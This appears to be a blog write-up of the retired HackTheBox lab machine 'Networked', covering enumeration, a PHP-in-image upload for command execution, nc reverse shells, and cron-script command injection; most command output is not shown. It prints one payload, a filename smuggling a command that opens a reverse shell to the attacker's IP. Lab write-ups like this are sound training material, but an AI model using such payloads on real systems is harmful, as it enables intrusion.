Networked just retired today. It was a pretty easy machine and I had the chance to practice my command injection skills. Its IP address is 10.10.10.146 and I added it to /etc/hosts as networked.htb to make accessing the machine easier. Without further ado, let’s jump right in!
Scanning & Web App Enumeration
A light nmap scan is all I needed to start attacking the box:
The index.html of the site was pretty basic:
There was also a hidden comment on the page:
I ran dirb on the page and found a directory named backup:
A file named backup.tar could be found in the directory:
I downloaded it and started looking through the source code:
Shell as www-data
Looking through the source, I didn’t find any major vulnerability that would allow me to change the uploaded file extension. However, the resulting file would keep all the extensions it has (e.g. a.php.jpg would be renamed [something].php.jpg). After re-reading the source code a few times, I tried to just append PHP code at the end of an image file and hope that the server will execute it if the filename contains .php:
I then uploaded the file by going to /upload.php:
After that, I browsed to /photos.php, right-licked the image I just uploaded and click on ‘View Image’ so my browser would take me to the site’s uploads directory.
The server didn’t interpret the file as an image. In other words, the server found .php in the filename and interpreted it as a PHP script. I tried to supply a simple command via the cmd parameter and see if I had command execution:
The id command was successfully executed. Moreover, I could see the output at the end of the page. With that in mind, I used nc to spawn a reverse shell on port 443:
As soon as I got the reverse shell, I spawned a tty:
Shell as guly
After that, I started enumerating and searching for a way to get user. The first thing I did was to see if there is another user on the machine:
The user seemed to have a crontab file, so I checked its contents:
Basically, the following script would be ran regularly:
There’s a simple command injection vulnerability in that script. I used touch ;$(nc 10.10.14.140 444 -c bash); to create a file that would get me a reverse shell whenever the script is executed. After waiting for about three minutes, I got the shell:
I will not post the contents of user.txt here, however, I will say that the proof starts with 52 🙂
After getting the user proof, I started enumerating the host. While doing that, I found an interesting /etc/sudoers entry:
The current user can run /usr/local/sbin/changename.sh without providing a password. The script’s source is pretty simple:
To be honest, I discovered the method to get root through fuzzing and trying different payloads.